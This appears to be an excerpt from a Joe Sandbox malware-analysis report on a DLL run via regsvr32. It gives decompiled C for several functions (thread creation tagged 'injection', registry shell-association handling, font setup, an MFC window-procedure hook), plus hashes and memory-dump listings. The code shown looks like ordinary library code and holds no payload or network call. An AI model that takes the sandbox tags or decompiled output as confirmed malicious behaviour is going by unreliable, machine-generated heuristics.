Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Long$PropRemove
String ID:
API String ID: 3256693057-0
Opcode ID: 6e4c55c40766712182291154b2c3daba02267a726f2aba7ef3935c388fb26ba1
Instruction ID: da5922da02c4ebdd5e747a6d48075077d1bd4fb481ff4237915430caf772cce4
Opcode Fuzzy Hash: 6e4c55c40766712182291154b2c3daba02267a726f2aba7ef3935c388fb26ba1
Instruction Fuzzy Hash: 07212B6A61103B6BE305E3387C80E6F238CEB4F6A17520522FA19C2251FE25DD8387B5

Uniqueness

Uniqueness Score: -1.00%

Function 1004653B Relevance: 16.6, APIs: 11, Instructions: 88
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1004653B(intOrPtr __ecx, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				signed char _v24;
				intOrPtr _v28;
				char _v32;
				void* _t40;
				void* _t45;
				intOrPtr _t54;

				_t54 = __ecx;
				E1001AB60( &_v32, 0, 0x1c);
				_v32 = E100648FB();
				_v28 = _t54;
				_v16 = CreateEventA(0, 1, 0, 0);
				_v12 = CreateEventA(0, 1, 0, 0);
				_t34 = _a4;
				_v24 = _a4;
				if(_v16 == 0) {
					L9:
					if(_v12 == 0) {
						L11:
						return 0;
					}
					L10:
					CloseHandle(_v12);
					goto L11;
				}
				if(_v12 == 0) {
					CloseHandle(_v16);
					goto L9;
				}
				_t10 = _t54 + 0x2c; // 0x2c
				_t40 = E1001C13A(_a12, _a8, E10046210,  &_v32, _t34 | 0x00000004, _t10);
				 *(_t54 + 0x28) = _t40;
				if(_t40 == 0) {
					goto L11;
				}
				ResumeThread(_t40);
				WaitForSingleObject(_v16, 0xffffffff);
				CloseHandle(_v16);
				if((_a4 & 0x00000004) != 0) {
					SuspendThread( *(_t54 + 0x28));
				}
				if(_v8 == 0) {
					SetEvent(_v12);
					_t45 = 1;
					return _t45;
				} else {
					WaitForSingleObject( *(_t54 + 0x28), 0xffffffff);
					CloseHandle( *(_t54 + 0x28));
					 *(_t54 + 0x28) = 0;
					goto L10;
				}
			}

0x1004654c
0x1004654f
0x10046567
0x1004656a
0x10046574
0x10046582
0x10046585
0x10046588
0x1004658b
0x1004660a
0x1004660d
0x10046614
0x00000000
0x10046614
0x1004660f
0x10046612
0x00000000
0x10046612
0x10046590
0x10046608
0x00000000
0x10046608
0x10046592
0x100465a8
0x100465b2
0x100465b5
0x00000000
0x00000000
0x100465b8
0x100465c3
0x100465cc
0x100465d2
0x100465d7
0x100465d7
0x100465e0
0x100465fa
0x10046602
0x00000000
0x100465e2
0x100465e7
0x100465f0
0x100465f2
0x00000000
0x100465f2

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 1004656D
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10046577
CloseHandle.KERNEL32(?), ref: 10046608

Part of subcall function 1001C13A: CreateThread.KERNEL32(?,?,1001C1A5,00000000,?,?), ref: 1001C17B
Part of subcall function 1001C13A: GetLastError.KERNEL32 ref: 1001C185

ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 100465B8
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 100465C3
CloseHandle.KERNEL32(?), ref: 100465CC
SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 100465D7
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 100465E7
CloseHandle.KERNEL32(?), ref: 100465F0
SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 100465FA
CloseHandle.KERNEL32(?), ref: 10046612

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseHandle$CreateEventThread$ObjectSingleWait$ErrorLastResumeSuspend
String ID:
API String ID: 1793282574-0
Opcode ID: 114206144c497fe8df12f25a3f23be32f45ffb6a87a103601e840691598161b5
Instruction ID: 44178815943e37198192f8261680a90d18a4d91b6178b038fc382b828ced5ac0
Opcode Fuzzy Hash: 114206144c497fe8df12f25a3f23be32f45ffb6a87a103601e840691598161b5
Instruction Fuzzy Hash: 28317C71C0020AFFEB109FA5CC8599EBBB9FB48354F21453AF519E1060E6319A81CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1006367E Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 199
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1006367E(void* __ecx, void* __edi) {
				void* __ebx;
				void* __esi;
				char* _t78;
				void* _t83;
				intOrPtr* _t84;
				char* _t85;
				void* _t93;
				char* _t119;
				void* _t129;
				char* _t130;
				intOrPtr* _t134;
				intOrPtr _t137;
				char* _t160;
				intOrPtr _t163;
				intOrPtr* _t165;
				long _t167;
				void* _t168;
				void* _t170;
				void* _t171;
				void* _t173;

				_t137 =  *((intOrPtr*)(__ecx + 0x80));
				E1001A9E0(0x10077908, _t168);
				_t171 = _t170 - 0x18;
				_t78 =  *0x1008f630; // 0x1008f644
				_t163 = _t137;
				 *(_t168 - 0x20) = _t78;
				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
				 *(_t168 - 0x10) = _t78;
				 *(_t168 - 4) = 1;
				E10048C6C(_t163,  *((intOrPtr*)(E10064B8B() + 8)), _t168 - 0x20);
				_t134 =  *((intOrPtr*)(_t163 + 8));
				if(_t134 != 0) {
					_t160 = "command";
					do {
						_t84 = _t134;
						_t134 =  *_t134;
						_t165 =  *((intOrPtr*)(_t84 + 8));
						_t85 =  *0x1008f630; // 0x1008f644
						 *(_t168 - 0x18) = _t85;
						 *(_t168 - 0x14) = _t85;
						 *(_t168 - 0x1c) = _t85;
						_push(5);
						_push(_t168 - 0x14);
						 *(_t168 - 4) = 4;
						if( *((intOrPtr*)( *_t165 + 0x64))() != 0 &&  *((intOrPtr*)( *(_t168 - 0x14) - 8)) != 0) {
							_t93 =  *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x1c, 6);
							_t181 = _t93;
							if(_t93 == 0) {
								E10045A57(_t134, _t168 - 0x1c, _t168, _t168 - 0x14);
							}
							E10037011(_t168 - 0x10, "%s\\DefaultIcon",  *(_t168 - 0x14));
							_t173 = _t171 + 0xc;
							E10065A71(_t181,  *(_t168 - 0x10));
							_push(0);
							_push(_t168 - 0x10);
							if( *((intOrPtr*)( *_t165 + 0x64))() == 0) {
								L9:
								_push("ddeexec");
								E10037011(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
								E10065A71(_t183,  *(_t168 - 0x10));
								_push("ddeexec");
								E10037011(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
								E10065A71(_t183,  *(_t168 - 0x10));
								_push("ddeexec");
								E10037011(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
								_t173 = _t173 + 0x30;
								E10065A71(_t183,  *(_t168 - 0x10));
							} else {
								_t130 =  *(_t168 - 0x10);
								_t183 =  *((intOrPtr*)(_t130 - 8));
								if( *((intOrPtr*)(_t130 - 8)) == 0) {
									goto L9;
								}
							}
							E10037011(_t168 - 0x10, "%s\\shell\\open\\%s",  *(_t168 - 0x14));
							E10065A71(_t183,  *(_t168 - 0x10));
							E10037011(_t168 - 0x10, "%s\\shell\\print\\%s",  *(_t168 - 0x14));
							E10065A71(_t183,  *(_t168 - 0x10));
							E10037011(_t168 - 0x10, "%s\\shell\\printto\\%s",  *(_t168 - 0x14));
							_t171 = _t173 + 0x30;
							E10065A71(_t183,  *(_t168 - 0x10));
							 *((intOrPtr*)( *_t165 + 0x64))(_t168 - 0x18, 4, _t160, _t160, _t160);
							_t119 =  *(_t168 - 0x18);
							_t184 =  *((intOrPtr*)(_t119 - 8));
							if( *((intOrPtr*)(_t119 - 8)) != 0) {
								 *(_t168 - 0x24) = 0x208;
								_t167 = RegQueryValueA(0x80000000, _t119, E10045D4E(_t168 - 0x10, _t168, 0x208), _t168 - 0x24);
								E10045D9D(_t168 - 0x10, _t184, 0xffffffff);
								if(_t167 != 0) {
									L14:
									E10037011(_t168 - 0x10, "%s\\ShellNew",  *(_t168 - 0x18));
									_t171 = _t171 + 0xc;
									E10065A71(_t187,  *(_t168 - 0x10));
									E10065A71(_t187,  *(_t168 - 0x18));
								} else {
									_t128 =  *(_t168 - 0x10);
									if( *((intOrPtr*)( *(_t168 - 0x10) - 8)) == _t167) {
										goto L14;
									} else {
										_t129 = E1001ABB8(_t128,  *(_t168 - 0x14));
										_t187 = _t129;
										if(_t129 == 0) {
											goto L14;
										}
									}
								}
							}
						}
						 *(_t168 - 4) = 3;
						E1004591E(_t168 - 0x1c);
						 *(_t168 - 4) = 2;
						E1004591E(_t168 - 0x14);
						 *(_t168 - 4) = 1;
						E1004591E(_t168 - 0x18);
					} while (_t134 != 0);
				}
				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
				E1004591E(_t168 - 0x10);
				 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
				_t83 = E1004591E(_t168 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
				return _t83;
			}

0x1006367e
0x10065bdd
0x10065be2
0x10065be5
0x10065bec
0x10065bee
0x10065bf1
0x10065bf5
0x10065bf8
0x10065c09
0x10065c0e
0x10065c13
0x10065c1a
0x10065c1f
0x10065c1f
0x10065c21
0x10065c23
0x10065c26
0x10065c2b
0x10065c2e
0x10065c31
0x10065c39
0x10065c3b
0x10065c3e
0x10065c47
0x10065c64
0x10065c67
0x10065c69
0x10065c72
0x10065c72
0x10065c83
0x10065c88
0x10065c8e
0x10065c98
0x10065c9a
0x10065ca2
0x10065cad
0x10065cad
0x10065cbe
0x10065cc9
0x10065cce
0x10065cdf
0x10065cea
0x10065cef
0x10065d00
0x10065d05
0x10065d0b
0x10065ca4
0x10065ca4
0x10065ca7
0x10065cab
0x00000000
0x00000000
0x10065cab
0x10065d1d
0x10065d28
0x10065d3a
0x10065d45
0x10065d57
0x10065d5c
0x10065d62
0x10065d71
0x10065d74
0x10065d77
0x10065d7b
0x10065d88
0x10065da6
0x10065da8
0x10065daf
0x10065dc8
0x10065dd4
0x10065dd9
0x10065ddf
0x10065de7
0x10065db1
0x10065db1
0x10065db7
0x00000000
0x10065db9
0x10065dbd
0x10065dc3
0x10065dc6
0x00000000
0x00000000
0x10065dc6
0x10065db7
0x10065daf
0x10065d7b
0x10065def
0x10065df3
0x10065dfb
0x10065dff
0x10065e07
0x10065e0b
0x10065e10
0x10065e18
0x10065e19
0x10065e20
0x10065e25
0x10065e2c
0x10065e36
0x10065e3e

APIs

__EH_prolog.LIBCMT ref: 10065BDD

Part of subcall function 10048C6C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10048C86
Part of subcall function 10048C6C: GetShortPathNameA.KERNEL32 ref: 10048C9E

RegQueryValueA.ADVAPI32(80000000,?,00000000,00000208), ref: 10065D9B

Strings

%s\shell\open\%s, xrefs: 10065CB8, 10065D17
%s\shell\print\%s, xrefs: 10065CD9, 10065D34
%s\shell\printto\%s, xrefs: 10065CFA, 10065D51
%s\ShellNew, xrefs: 10065DCE
ddeexec, xrefs: 10065CAD, 10065CCE, 10065CEF
%s\DefaultIcon, xrefs: 10065C7D
command, xrefs: 10065C1A, 10065D10, 10065D2D, 10065D4A

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Name$FileH_prologModulePathQueryShortValue
String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
API String ID: 365916388-556638191
Opcode ID: 822788ea420fead2d11c217631af6e5a4304e0d9e5574c16a69e7cfc110a6ca4
Instruction ID: d66ce52762c8ef1d700209654a97eaea13acf27c1a4be6124d1a4aa73091450e
Opcode Fuzzy Hash: 822788ea420fead2d11c217631af6e5a4304e0d9e5574c16a69e7cfc110a6ca4
Instruction Fuzzy Hash: 6871497990011AAFDF15DBE4CC85AAEBBB9FF08301F500468F115B61A2EB366A04CB65

Uniqueness

Uniqueness Score: -1.00%

Function 1000F316 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 121
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000F316(intOrPtr __ecx) {
				intOrPtr _t54;
				void* _t55;
				signed int _t71;
				signed int _t73;
				signed int _t78;
				void* _t80;
				void* _t82;
				short* _t96;
				signed int _t97;
				intOrPtr _t100;
				int _t102;
				intOrPtr* _t103;
				void* _t105;
				void* _t107;
				short* _t108;

				E1001A9E0(0x10076728, _t105);
				_t108 = _t107 - 0x7c;
				_t100 = __ecx;
				 *((intOrPtr*)(_t105 - 0x10)) = __ecx;
				 *(_t105 - 0x14) = 0;
				 *((intOrPtr*)(_t105 - 0x18)) = 0x1007b774;
				_t54 =  *((intOrPtr*)(_t105 + 8));
				 *((intOrPtr*)(_t105 - 4)) = 0;
				if(_t54 == 0 ||  *(_t54 + 4) == 0) {
					_t55 = GetStockObject(0x11);
					 *(_t105 - 0x14) = _t55;
					if(_t55 != 0) {
						L5:
						_t54 = _t105 - 0x18;
						goto L6;
					} else {
						_t82 = GetStockObject(0xd);
						 *(_t105 - 0x14) = _t82;
						if(_t82 != 0) {
							goto L5;
						} else {
							 *((intOrPtr*)(_t100 + 0x44)) = 0;
							 *((intOrPtr*)(_t105 - 0x18)) = 0x1007b764;
							 *((intOrPtr*)(_t105 - 4)) = 1;
						}
					}
				} else {
					L6:
					_t87 = _t105 - 0x88;
					_t14 = _t54 + 4; // 0x1000f4d4
					GetObjectA( *_t14, 0x3c, _t105 - 0x88);
					 *(_t105 - 0x4c) = 0x20;
					__eflags = _t105 != 0x6c;
					if(_t105 != 0x6c) {
						_t102 = lstrlenA(_t105 - 0x6c) + 1;
						__eflags = _t102 + _t102 + 0x00000003 & 0x000000fc;
						E1001B2B0(_t102 + _t102 + 0x00000003 & 0x000000fc, _t87);
						_t96 = _t108;
						 *_t96 = 0;
						MultiByteToWideChar(0, 0, _t105 - 0x6c, 0xffffffff, _t96, _t102);
						_t100 =  *((intOrPtr*)(_t105 - 0x10));
						 *(_t105 - 0x48) = _t96;
					} else {
						 *(_t105 - 0x48) = 0;
					}
					 *((short*)(_t105 - 0x3c)) =  *((intOrPtr*)(_t105 - 0x78));
					 *(_t105 - 0x3a) =  *(_t105 - 0x71) & 0x000000ff;
					 *(_t105 - 0x38) =  *(_t105 - 0x74) & 0x000000ff;
					 *(_t105 - 0x34) =  *(_t105 - 0x73) & 0x000000ff;
					 *(_t105 - 0x30) =  *(_t105 - 0x72) & 0x000000ff;
					_t71 =  *(_t105 - 0x88);
					__eflags = _t71;
					_t97 = _t71;
					if(__eflags < 0) {
						_t97 =  ~_t71;
					}
					L1004F725(_t105 - 0x2c, __eflags);
					 *((char*)(_t105 - 4)) = 2;
					_t73 = GetDeviceCaps( *(_t105 - 0x24), 0x5a);
					asm("cdq");
					_t103 = _t100 + 0x44;
					 *((intOrPtr*)(_t105 - 0x40)) = 0;
					 *(_t105 - 0x44) = _t97 * 0xafc80 / _t73;
					L10069095(_t103);
					_t78 = _t105 - 0x4c;
					__imp__#253(_t78, 0x10081370, _t103,  *((intOrPtr*)(_t100 + 0x1c)));
					__eflags = _t78;
					if(__eflags < 0) {
						 *_t103 = 0;
					}
					 *((char*)(_t105 - 4)) = 0;
					L1004F797(_t105 - 0x2c, __eflags);
					 *((intOrPtr*)(_t105 - 0x18)) = 0x1007b764;
					 *((intOrPtr*)(_t105 - 4)) = 3;
				}
				_t80 = L1004F970(_t105 - 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t105 - 0xc));
				return _t80;
			}

0x1000f31b
0x1000f320
0x1000f325
0x1000f32a
0x1000f32d
0x1000f330
0x1000f337
0x1000f33a
0x1000f33f
0x1000f34e
0x1000f352
0x1000f355
0x1000f378
0x1000f378
0x00000000
0x1000f357
0x1000f359
0x1000f35d
0x1000f360
0x00000000
0x1000f362
0x1000f362
0x1000f365
0x1000f36c
0x1000f36c
0x1000f360
0x1000f37b
0x1000f37b
0x1000f37b
0x1000f384
0x1000f387
0x1000f390
0x1000f397
0x1000f399
0x1000f3ac
0x1000f3b3
0x1000f3b5
0x1000f3ba
0x1000f3c6
0x1000f3c9
0x1000f3cf
0x1000f3d2
0x1000f39b
0x1000f39b
0x1000f39b
0x1000f3d9
0x1000f3e2
0x1000f3ea
0x1000f3f1
0x1000f3f8
0x1000f3fb
0x1000f401
0x1000f403
0x1000f405
0x1000f409
0x1000f409
0x1000f411
0x1000f418
0x1000f41f
0x1000f42f
0x1000f432
0x1000f435
0x1000f439
0x1000f43c
0x1000f442
0x1000f44b
0x1000f451
0x1000f453
0x1000f455
0x1000f455
0x1000f45a
0x1000f45d
0x1000f462
0x1000f469
0x1000f469
0x1000f473
0x1000f481
0x1000f48c

APIs

__EH_prolog.LIBCMT ref: 1000F31B
GetStockObject.GDI32(00000011), ref: 1000F34E
GetStockObject.GDI32(0000000D), ref: 1000F359
GetObjectA.GDI32(1000F4D4,0000003C,?), ref: 1000F387
lstrlenA.KERNEL32(?), ref: 1000F3A4
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 1000F3C9
GetDeviceCaps.GDI32(?,0000005A), ref: 1000F41F
#253.OLEPRO32(00000020,10081370,?,?,00000001), ref: 1000F44B

Strings

, xrefs: 1000F390

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$#253ByteCapsCharDeviceH_prologMultiWidelstrlen
String ID:
API String ID: 274612576-3916222277
Opcode ID: 6aa14f1a46ba21c13210deb43eaf4782e1f8963ae1ad2e61ab73770427147d91
Instruction ID: c721e447081f3bddadc74f4f5915bbf5bd23be3eabfbe52fa69c7fc36f093b81
Opcode Fuzzy Hash: 6aa14f1a46ba21c13210deb43eaf4782e1f8963ae1ad2e61ab73770427147d91
Instruction Fuzzy Hash: BA4158B5D0025ADFDB10DFA4C885AEDBBF8FF09294F20402EE945E3251E7749A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1004205A Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1004205A(void* __ecx, void* __edx) {
				_Unknown_base(*)()* _t33;
				void* _t35;
				void* _t36;
				void* _t41;
				void* _t44;
				long _t54;
				signed int _t58;
				void* _t61;
				void* _t66;
				struct HWND__* _t68;
				CHAR* _t71;
				void* _t74;
				void* _t75;
				void* _t77;

				_t66 = __edx;
				_t61 = __ecx;
				E1001A9E0(0x10076534, _t75);
				_t68 =  *(_t75 + 8);
				_t71 = "AfxOldWndProc423";
				 *((intOrPtr*)(_t75 - 0x10)) = _t77 - 0x40;
				_t33 = GetPropA(_t68, _t71);
				 *(_t75 - 0x14) =  *(_t75 - 0x14) & 0x00000000;
				 *(_t75 - 4) =  *(_t75 - 4) & 0x00000000;
				 *(_t75 - 0x18) = _t33;
				_t35 =  *(_t75 + 0xc) - 6;
				_t58 = 1;
				if(_t35 == 0) {
					_t36 = E10041F78(_t75,  *(_t75 + 0x14));
					E10041CE0(_t61, E10041F78(_t75, _t68),  *(_t75 + 0x10), _t36);
					goto L9;
				} else {
					_t41 = _t35 - 0x1a;
					if(_t41 == 0) {
						_t58 = 0 | E10041D41(E10041F78(_t75, _t68),  *(_t75 + 0x14),  *(_t75 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t44 = _t41 - 0x62;
						if(_t44 == 0) {
							SetWindowLongA(_t68, 0xfffffffc,  *(_t75 - 0x18));
							RemovePropA(_t68, _t71);
							GlobalDeleteAtom(GlobalFindAtomA(_t71));
							goto L10;
						} else {
							if(_t44 != 0x8e) {
								L10:
								 *(_t75 - 0x14) = CallWindowProcA( *(_t75 - 0x18), _t68,  *(_t75 + 0xc),  *(_t75 + 0x10),  *(_t75 + 0x14));
							} else {
								_t74 = E10041F78(_t75, _t68);
								E10041C44(_t74, _t75 - 0x30, _t75 - 0x1c);
								_t54 = CallWindowProcA( *(_t75 - 0x18), _t68, 0x110,  *(_t75 + 0x10),  *(_t75 + 0x14));
								_push( *((intOrPtr*)(_t75 - 0x1c)));
								 *(_t75 - 0x14) = _t54;
								_push(_t75 - 0x30);
								_push(_t74);
								E10041C67(_t66);
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t75 - 0xc));
				return  *(_t75 - 0x14);
			}

0x1004205a
0x1004205a
0x1004205f
0x1004206a
0x1004206d
0x10042072
0x10042077
0x1004207d
0x10042081
0x10042085
0x1004208d
0x10042090
0x10042091
0x10042147
0x10042159
0x00000000
0x10042097
0x10042097
0x1004209a
0x1004213f
0x1004215e
0x10042160
0x00000000
0x00000000
0x100420a0
0x100420a0
0x100420a3
0x10042105
0x1004210d
0x1004211b
0x00000000
0x100420a5
0x100420aa
0x10042162
0x10042175
0x100420b0
0x100420b6
0x100420c1
0x100420d5
0x100420db
0x100420de
0x100420e4
0x100420e5
0x100420e6
0x100420e6
0x100420aa
0x100420a3
0x1004209a
0x100420f3
0x100420fc

APIs

__EH_prolog.LIBCMT ref: 1004205F
GetPropA.USER32(?,AfxOldWndProc423), ref: 10042077
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 100420D5

Part of subcall function 10041C67: GetWindowRect.USER32(?,?), ref: 10041C8C
Part of subcall function 10041C67: GetWindow.USER32(?,00000004), ref: 10041CA9

SetWindowLongA.USER32(?,000000FC,?), ref: 10042105
RemovePropA.USER32(?,AfxOldWndProc423), ref: 1004210D
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10042114
GlobalDeleteAtom.KERNEL32(00000000), ref: 1004211B

Part of subcall function 10041C44: GetWindowRect.USER32(?,?), ref: 10041C50

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1004216F

Strings

AfxOldWndProc423, xrefs: 1004206D, 10042075, 1004210B, 10042113

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
